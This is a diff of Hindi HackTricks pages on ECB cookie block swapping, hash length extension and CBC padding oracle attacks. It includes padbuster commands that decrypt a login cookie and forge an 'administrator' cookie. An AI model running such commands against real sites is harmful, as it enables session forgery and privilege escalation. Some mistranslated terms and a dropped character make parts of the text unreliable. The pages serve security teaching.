हम पहले बनाए गए पैटर्न `\x23U\xE45K\xCB\x21\xC8` को देख सकते हैं जो पिछले उपयोगकर्ता नाम के साथ बनाया गया था जिसमें केवल `a` शामिल था।\ हम पहले से बनाए गए पैटर्न `\x23U\xE45K\xCB\x21\xC8` को देख सकते हैं जो उस उपयोगकर्ता नाम के साथ बनाया गया था जिसमें केवल `a` था।\
फिर, आप पहले 8B ब्लॉक को हटा सकते हैं और आपको उपयोगकर्ता नाम `admin` के लिए एक मान्य कुकी मिलेगी: फिर, आप पहले 8B ब्लॉक को हटा सकते हैं और आपको उपयोगकर्ता नाम `admin` के लिए एक मान्य कुकी मिलेगी:
``` ```
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
``` ```
## ब्लॉक्स को हटाना ## ब्लॉकों को हटाना
कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना समान होता है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_ कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना समान होता है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_
इसलिए, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है: तो, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है:
* एक उपयोगकर्ता नाम जेनरेट करें जो: `len(<username>) + len(<delimiter) % len(block)`. `8B` ब्लॉक साइज के साथ आप `username ` नामक उपयोगकर्ता नाम जेनरेट कर सकते हैं, डिलीमिटर `|` के साथ टुकड़ा `<username><delimiter>` 2 ब्लॉक्स को जेनरेट करेगा। * एक उपयोगकर्ता नाम जेनरेट करें जो: `len(<username>) + len(<delimiter) % len(block)`. `8B` ब्लॉक का आकार होने पर आप `username ` नामक उपयोगकर्ता उत्पन्न कर सकते हैं, डिलीमिटर `|` के साथ टुकड़ा `<username><delimiter>` 2 ब्लॉक्स को उत्पन्न करेगा।
* फिर, एक पासवर्ड जेनरेट करें जो उस उपयोगकर्ता नाम और रिक्त स्थानों को भरेगा, जिसे हम अनुकरण करना चाहते हैं, जैसे: `admin ` * फिर, एक पासवर्ड जेनरेट करें जो उसी संख्या के ब्लॉक्स को भरेगा जिसमें हम उपनामित करना चाहते हैं और रिक्त स्थान हों, जैसे: `admin `
इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता नाम का नकली है): `username |admin ` इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता का नाम बना रहेगा): `username |admin `
** फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`** **फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और आप उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`**
# संदर्भ ## संदर्भ
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))

View file

@ -1,42 +1,43 @@
{% hint style="success" %}
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में
</details> </details>
{% endhint %}
# हमले का सारांश # हमले का सारांश
एक सर्वर की कलर टेक्स्ट डेटा के साथ कुछ गुप्त से जोड़कर उस डेटा का हैश बनाता है। यदि आप जानते हैं: एक सर्वर की कलर टेक्स्ट डेटा के साथ कुछ गोपनीय जोड़कर उस डेटा को हैश कर रहा है। यदि आप जानते हैं:
* **गुप्त की लंबाई** (यह एक दी गई लंबाई सीमा से भी bruteforced किया जा सकता है) * **गोपनीय की लंबाई** (यह दी गई लंबाई सीमा से भी ब्रूटफोर्स किया जा सकता है)
* **स्पष्ट पाठ डेटा** * **स्पष्ट पाठ डेटा**
* **एल्गोरिथ्म (और यह हमले के लिए वंर्नरबल है)** * **एल्गोरिथ्म (और यह हमले के लिए वंशानुक्रमित है)**
* **पैडिंग ज्ञात है** * **पैडिंग ज्ञात है**
* आम तौर पर एक डिफ़ॉल्ट प्रयोग होता है, इसलिए अगर अन्य 3 आवश्यकताएं पूरी होती हैं, तो यह भी होता है * आम तौर पर एक डिफ़ॉल्ट प्रयोग होता है, इसलिए अगर अन्य 3 आवश्यकताएं पूरी होती हैं, तो यह भी होता है
* पैडिंग गुप्त+डेटा की लंबाई पर निर्भर होता है, इसलिए गुप्त की लंबाई की आवश्यकता है * पैडिंग गोपनीय+डेटा की लंबाई पर निर्भर होता है, इसलिए गोपनीय की लंबाई की आवश्यकता है
तो, एक **हमलावर** के लिए संभव है कि वह **डेटा** को **जोड़ सकता है** और **पिछले डेटा + जोड़े गए डेटा** के लिए एक मान्य **सिग्नेचर** उत्पन्न कर सकता है। तो, एक **हमलावर** के लिए संभव है कि वह **डेटा** को **जोड़ सकता है** और **पिछले डेटा + जोड़े गए डेटा** के लिए एक मान्य **सिग्नेचर** उत्पन्न कर सकता है।
## कैसे? ## कैसे?
मूल रूप से वंर्नरबल एल्गोरिथ्म पहले **डेटा ब्लॉक का हैश बनाते हैं**, और फिर, **पहले** बनाए गए **हैश** (स्थिति) से, वे **अगले डेटा ब्लॉक को जोड़ते हैं** और **उसे हैश करते हैं** मूल रूप से, वंशानुक्रमित एल्गोरिथ्म पहले **डेटा ब्लॉक को हैश** करके हैश उत्पन्न करते हैं, और फिर, **पिछले** बनाए गए **हैश** (स्थिति) से, वे **अगले डेटा ब्लॉक को जोड़ते हैं** और **हैश** करते हैं।
फिर, यहां सोचें कि गुप्त "गुप्त" है और डेटा "डेटा" है, "गुप्तडेटा" का MD5 6036708eba0d11f6ef52ad44e8b74d5b है।\ फिर, यहां यह विचार करें कि गोपनीय "गोपनीय" है और डेटा "डेटा" है, "गोपनीयडेटा" का MD5 6036708eba0d11f6ef52ad44e8b74d5b है।\
यदि एक हमलावर "जोड़ना" स्ट्रिंग जोड़ना चाहता है तो वह: यदि एक हमलावर "जोड़ना" स्ट्रिंग जोड़ना चाहता है तो वह:
* 64 "A" का MD5 उत्पन्न करें * 64 "" का MD5 उत्पन्न करें
* पहले इनिशियलाइज़ हैश की स्थिति को 6036708eba0d11f6ef52ad44e8b74d5b पर बदलें * पहले से ही आरंभित हैश की स्थिति को 6036708eba0d11f6ef52ad44e8b74d5b पर बदलें
* स्ट्रिंग "जोड़ना" जोड़ें * स्ट्रिंग "जोड़ना" जोड़ें
* हैश समाप्त करें और परिणामी हैश "गुप्त" + "डेटा" + "पैडिंग" + "जोड़ना" के लिए **मान्य होगा** * हैश समाप्त करें और परिणामी हैश "गोपनीय" + "डेटा" + "पैडिंग" + "जोड़ना" के लिए एक **मान्य** होगा**
## **उपकरण** ## **उपकरण**
@ -44,19 +45,20 @@ HackTricks का समर्थन करने के अन्य तरी
## संदर्भ ## संदर्भ
आप इस हमले को [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) में अच्छी तरह से समझ सकते हैं आप इस हमले को अच्छी तरह से समझ सकते हैं [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
{% hint style="success" %}
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में
</details> </details>
{% endhint %}

View file

@ -1,55 +1,56 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** और **PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
# CBC - Cipher Block Chaining # CBC - साइफर ब्लॉक चेनिंग
CBC मोड में **पिछले एन्क्रिप्टेड ब्लॉक का उपयोग IV के रूप में** किया जाता है जिसे अगले ब्लॉक के साथ XOR किया जाता है: CBC मोड में **पिछले एन्क्रिप्टेड ब्लॉक का उपयोग IV के रूप में** किया जाता है अगले ब्लॉक के साथ XOR करने के लिए:
![CBC encryption](https://defuse.ca/images/cbc\_encryption.png) ![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png)
CBC को **डिक्रिप्ट** करने के लिए **विपरीत** **ऑपरेशन** किए जाते हैं: CBC को डिक्रिप्ट करने के लिए **विपरीत** **ऑपरेशन** किए जाते हैं:
![CBC decryption](https://defuse.ca/images/cbc\_decryption.png) ![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png)
ध्यान दें कि एक **एन्क्रिप्शन कुंजी** और एक **IV** का उपयोग करना आवश्यक है। ध्यान दें कि एक **एन्क्रिप्शन** **कुंजी** और एक **IV** का उपयोग करना आवश्यक है।
# संदेश पैडिंग # संदेश पैडिंग
जैसा कि एन्क्रिप्शन **निश्चित आकार के ब्लॉक** में किया जाता है, इसलिए **पैडिंग**ो सामान्यत: **अंतिम ब्लॉक** में उसकी लंबाई पूरी करने के लिए आवश्यक होता है।\ जैसा कि एन्क्रिप्शन **निश्चित** **साइज** **ब्लॉक्स** में किया जाता है, इसलिए **पैडिंग**ी आवश्यकता होती है **अंतिम** **ब्लॉक** की लंबाई पूरी करने के लिए।\
आम तौर पर **PKCS7** का उपयोग किया जाता है, जो एक पैडिंग उत्पन्न करता है **जो ब्लॉक को पूरा करने के लिए आवश्यक बाइट्स की संख्या को दोहराता है**। उदाहरण के लिए, यदि अंतिम ब्लॉक में 3 बाइट छूट रही है, तो पैडिंग `\x03\x03\x03` होगा। आम तौर पर **PKCS7** का उपयोग किया जाता है, जो एक पैडिंग उत्पन्न करता है **आवश्यक** **बाइट्स** **की संख्या** **पूरी** **करने** के **लिए** ब्लॉक। उदाहरण के लिए, यदि अंतिम ब्लॉक में 3 बाइट्स की कमी है, तो पैडिंग `\x03\x03\x03` होगा।
एक **8 बाइट लंबाई के 2 ब्लॉक** के साथ और अधिक उदाहरणों पर ध्यान दें: एक **8 बाइट्स की लंबाई के 2 ब्लॉक्स** के साथ और अधिक उदाहरणों पर नजर डालें:
| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | | बाइट #0 | बाइट #1 | बाइट #2 | बाइट #3 | बाइट #4 | बाइट #5 | बाइट #6 | बाइट #7 | बाइट #0 | बाइट #1 | बाइट #2 | बाइट #3 | बाइट #4 | बाइट #5 | बाइट #6 | बाइट #7 |
| ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | 6 | **0x02** | **0x02** | | P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | 6 | **0x02** | **0x02** |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | **0x03** | **0x03** | **0x03** | | P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | **0x03** | **0x03** | **0x03** |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | | P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
| P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | | P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
ध्यान दें कि अंतिम उदाहरण में **अंतिम ब्लॉक पूरा था इसलिए एक और पैडिंग के साथ एक और उत्पन्न किया गया था**। ध्यान दें कि अंतिम उदाहरण में **अंतिम ब्लॉक पूरा था इसलिए केवल पैडिंग के साथ एक और उत्पन्न किया गया था**।
# पैडिंग ऑरेकल # पैडिंग ऑरेकल
जब एक एप्लिकेशन एन्क्रिप्टेड डेटा को डिक्रिप्ट करती है, तो पहले वह डेटा को डिक्रिप्ट करेगी; फिर वह पैडिंग को हटाएगी। पैडिंग को साफ करते समय, यदि **अमान्य पैडिंग एक पहचानने योग्य व्यवहार को ट्रिगर** करता है, तो आपके पास एक **पैडिंग ऑरेकल संरचना** है। पहचानने योग्य व्यवहार एक **त्रुटि**, **परिणामों की कमी**, या **धीमा प्रतिक्रिया** हो सकती है। जब एक एप्लिकेशन एन्क्रिप्टेड डेटा को डिक्रिप्ट करती है, तो पहले डेटा को डिक्रिप्ट किया जाएगा; फिर पैडिंग को हटाया जाएगा। पैडिंग को साफ करते समय, यदि **अमान्य पैडिंग एक पहचानने योग्य व्यवहार** को ट्रिगर करता है, तो आपके पास एक **पैडिंग ऑरेकल संरक्षितता** है। पहचानने योग्य व्यवहार एक **त्रुटि**, **परिणामों की कमी**, या **धीमा प्रतिक्रिया** हो सकती है।
इस व्यवहार को पहचानने पर, आप **एन्क्रिप्टेड डेटा को डिक्रिप्ट** कर सकते हैं और यहा तक कि **कोई साफ-टेक्स्ट एन्क्रिप्ट** कर सकते हैं। यदि आप इस व्यवहार को पहचानते हैं, तो आप **एन्क्रिप्टेड डेटा को डिक्रिप्ट** कर सकते हैं और यहा तक कि **कोई साफ-टेक्स्ट एन्क्रिप्ट** कर सकते हैं।
## उत्पीडन कैसे करें ## उत्पीडन कैसे करें
आप [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) का उपयोग कर सकते हैं इस प्रकार की भयंकरता का उत्पीडन करने के लिए या बस करें आप [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) का उपयोग इस प्रकार की सुरक्षा भेदभाव का शिकार होने के लिए कर सकते हैं या बस करें
``` ```
sudo apt-get install padbuster sudo apt-get install padbuster
``` ```
@ -57,25 +58,25 @@ sudo apt-get install padbuster
```bash ```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
``` ```
**कोडिंग 0** का मतलब है कि **base64** का उपयोग किया जाता है (लेकिन अन्य भी उपलब्ध हैं, मदद मेनू की जांच करें)। **कोडिंग 0** यह अर्थ है कि **बेस64** का उपयोग किया जाता है (लेकिन अन्य भी उपलब्ध हैं, मदद मेनू की जांच करें)।
आप इस सुरक्षा दोष का दुरुपयोग करके नए डेटा को एन्क्रिप्ट करने के लिए भी उपयोग कर सकते हैं। उदाहरण के लिए, यदि कुकी की सामग्री "**_**user=MyUsername**_**" है, तो आप इसे "\_user=administrator\_" में बदल सकते हैं और एप्लिकेशन के अंदर वरीयताएँ बढ़ा सकते हैं। आप `paduster` का उपयोग करके भी इसे कर सकते हैं, -plaintext** पैरामीटर को निर्दिष्ट करते हुए: आप इस सुरक्षा दोष का दुरुपयोग करके नए डेटा को एन्क्रिप्ट करने के लिए भी उपयोग कर सकते हैं। उदाहरण के लिए, यदि कुकी की सामग्री "**_**user=MyUsername**_**" है, तो आप इसे "\_user=administrator\_" में बदल सकते हैं और एप्लिकेशन के अंदर विशेषाधिकारों को उन्नत कर सकते हैं। आप `paduster` का उपयोग करके भी इसे कर सकते हैं, -plaintext** पैरामीटर को निर्दिष्ट करके:
```bash ```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
``` ```
यदि साइट भेद्य है, तो `padbuster` स्वतः प्रयास करेगा कि पैडिंग त्रुटि कब होती है, लेकिन आप इसे **-error** पैरामीटर का उपयोग करके त्रुटि संदेश को भी दिखा सकते हैं। यदि साइट वंर्नरबल है, तो `padbuster` स्वचालित रूप से कोशिश करेगा कि पैडिंग त्रुटि कब होती है, लेकिन आप इसे **-error** पैरामीटर का उपयोग करके त्रुटि संदेश को भी निर्दिष्ट कर सकते हैं।
```bash ```bash
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
``` ```
## सिद्धांत ## सिद्धांत
**सारांश में**, आप सही मानों की अनुमान लगाकर शुरू कर सकते हैं जो सभी **विभिन्न पैडिंग** बनाने के लिए उपयोग किए जा सकते हैं। फिर, पैडिंग ऑरेकल हमला शुरू होगा जो अंत से शुरू तक बाइट्स को डिक्रिप्ट करने लगेगा जिसे यह अनुमान लगाएगा कि कौन सा सही मान होगा जो **1, 2, 3** आदि का पैडिंग बनाता है **सारांश में**, आप सही मानों की अनुमान लगाकर एन्क्रिप्टेड डेटा का डिक्रिप्शन शुरू कर सकते हैं जो सभी **विभिन्न पैडिंग** बनाने के लिए उपयोग किए जा सकते हैं। फिर, पैडिंग ऑरेकल हमला शुरू होगा जो अंत से शुरू तक बाइट्स को डिक्रिप्ट करने लगेगा जिसे अनुमान लगाकर पता लगाया जाएगा कि **1, 2, 3, आदि कैसे पैडिंग बनाई जा सकती है**
![](<../.gitbook/assets/image (629) (1) (1).png>) ![](<../.gitbook/assets/image (629) (1) (1).png>)
कल्पना करें कि आपके पास कुछ एन्क्रिप्टेड पाठ है जो **2 ब्लॉक्स** को बनाता है जिनमें से बाइट्स **E0 से E15** तक हैं।\ कल्पना करें कि आपके पास कुछ एन्क्रिप्टेड पाठ है जो **E0 से E15** तक के बाइट्स द्वारा बने **2 ब्लॉक** में ले लेता है।\
**अंतिम** **ब्लॉक** (**E8** से **E15**) को **डिक्रिप्ट** करने के लिए, पूरे ब्लॉक को "ब्लॉक साइपर डिक्रिप्शन" के माध्यम से गुजरना होगा ज**इंटरमीडिएट बाइट्स I0 से I15** उत्पन्न करेगा।\ **अंतिम ब्लॉक** (**E8** से **E15**) को **डिक्रिप्ट** करने के लिए, पूरे ब्लॉक को "ब्लॉक साइपर डिक्रिप्शन" के माध्यम से गुजरना होगा जिससे **इंटरमीडिएट बाइट्स I0 से I15** उत्पन्न होंगे।\
अंततः, प्रत्येक इंटरमीडिएट बाइट पिछले एन्क्रिप्टेड बाइट्स (E0 से E7) के साथ **XORed** किया जाएगा। इसलिए: अंततः, प्रत्येक इंटरमीडिएट बाइट पिछले एन्क्रिप्टेड बाइट्स (E0 से E7) के साथ **XORed** किया जाएगा। इस प्रकार:
* `C15 = D(E15) ^ E7 = I15 ^ E7` * `C15 = D(E15) ^ E7 = I15 ^ E7`
* `C14 = I14 ^ E6` * `C14 = I14 ^ E6`
@ -83,42 +84,27 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon
* `C12 = I12 ^ E4` * `C12 = I12 ^ E4`
* ... * ...
अब, **`E7` को `C15` `0x01` तक मॉडिफाई करना संभव है**, जो एक सही पैडिंग होगा। इसलिए, इस मामले में: `\x01 = I15 ^ E'7` अब, **`C15` को `0x01` तक बनाने के लिए `E7` को संशोधित करना संभव है**, जो एक सही पैडिंग होगा। इसलिए, इस मामले में: `\x01 = I15 ^ E'7`
इसलिए, `E'7` ढूंढने के बाद, **I15 की गणना संभव है**: `I15 = 0x01 ^ E'7` इसलिए, `E'7` खोजने पर, यह **संभव है कि हम I15 की गणना कर सकें**: `I15 = 0x01 ^ E'7`
जो हमें **C15 की गणना करने की अनुमति देता है**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` जो हमें **`C15` की गणना करने की अनुमति देता है**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
**C15** को जानकर, अब **C14 की गणना संभव है**, लेकिन इस बार पैडिंग `\x02\x02` को ब्रूट-फोर्स करना होगा। **C15** को जानने के बाद, अब **`C14` की गणना करना संभव है**, लेकिन इस बार पैडिंग `\x02\x02` को ब्रूट-फोर्स करना होगा।
यह बीएफ पिछले एक के तुलना में इसी कठिनाई का है क्योंकि यह संभव है कि `E''15` की गणना की जाए जिसका मान 0x02 है: `E''7 = \x02 ^ I15` इसलिए बस **`E'14`** ढूंढना होगा जो **`C14` को `0x02` के बराबर बनाता है**।\ यह बीएफ पिछले एक के तुलना में इसी कठिनाई का है क्योंकि यह संभव है कि `E''15` की गणना की जाए जिसका मान 0x02 है: `E''7 = \x02 ^ I15` इसलिए बस **`E'14`** खोजने की आवश्यकता है जो एक **`C14` को `0x02` के बराबर** उत्पन्न करता है।\
फिर, C14 को डिक्रिप्ट करने के लिए एक ही कदम उठाएं: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** फिर, C14 को डिक्रिप्ट करने के लिए एक ही कदम उठाएं: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
**पूरे एन्क्रिप्टेड पाठ को डिक्रिप्ट करने तक इस श्रृंखला का पालन करें।** **इस श्रृंखला का पालन करें जब तक आप पूरे एन्क्रिप्टेड पाठ को डिक्रिप्ट नहीं कर लेते।**
## सुरक्षितता की खोज ## संक्रमण की पहचान
एक खाता रजिस्टर करें और इस खाते से लॉग इन करें।\ एक खाता पंजीकृत करें और इस खाते से लॉग इन करें।\
